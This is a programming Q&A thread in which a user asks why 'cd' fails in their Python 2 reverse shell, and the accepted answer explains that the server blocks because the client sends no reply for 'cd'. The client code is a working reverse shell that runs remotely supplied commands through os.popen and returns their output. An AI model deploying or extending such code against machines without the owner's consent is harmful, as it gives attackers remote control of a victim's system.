# Why is cd not working on my reverse shell?

Tags: python, shell, cd

I am making a reverse shell in Python 2. However, I can't get `cd` (change directory) to work.

Here is my code for the `server`:

```
#!/usr/bin/python
import socket

host = socket.gethostname()
port = 1337
s = socket.socket()

s.bind((host, port))
s.listen(1)
while True:
    c, addr = s.accept()
    print "Accepted connection from", addr
    while True:
        cmd = raw_input(">>> ")
        c.send(cmd)
        print c.recv(1024)

s.close()
```

And here is my code for the `client`:

```
#!/usr/bin/python
import socket, os

s = socket.socket()
host = socket.gethostname()
port = 1337

s.connect((host, port))
while True:
    cmd = s.recv(1024)
    if cmd[:2] == "cd":
        os.chdir(str(cmd[3:]))
    else:
        o = os.popen(cmd).read()
        s.send(o)
```

What am I doing wrong? Why is changing the directory not working?

EDIT: The command line doesn't return a new `>>>` prompt.

Comment: What does "not working" mean?  Are you getting an exception thrown somewhere?  If so, please include the entire error printout including traceback.

Comment: @Billy The command line doesn't return a new ">>>" prompt.

Comment: In your client you don't send any response for the 'cd' command and so the server will wait forever for a response in 'recv'

Answer (score 2, accepted):

The problem here is that the server code expects a response for *every* command however for the `cd` command the client does not provide any response.

On the server you have:

```
while True:
    cmd = raw_input(">>> ")
    c.send(cmd)              # send the command to the client
    print c.recv(1024)       # block and then read (up to) 1024 characters from the client
```

However in the client you do:

```
while True:
    cmd = s.recv(1024)            # block and then read (up to) 1024 characters from the server
    if cmd[:2] == "cd":
        os.chdir(str(cmd[3:]))    # no response sent for the `cd` case
    else:
        o = os.popen(cmd).read()
        s.send(o)                 # send a response to the server for all other cases
```

One easy solution would be to have the `cd` case return an `OK` response which the server discards.

Note that in Python sockets and therefore `socket.recv()` is a [blocking operation by default](https://stackoverflow.com/questions/9770567/python-tcp-socket-blocks-on-recv-method).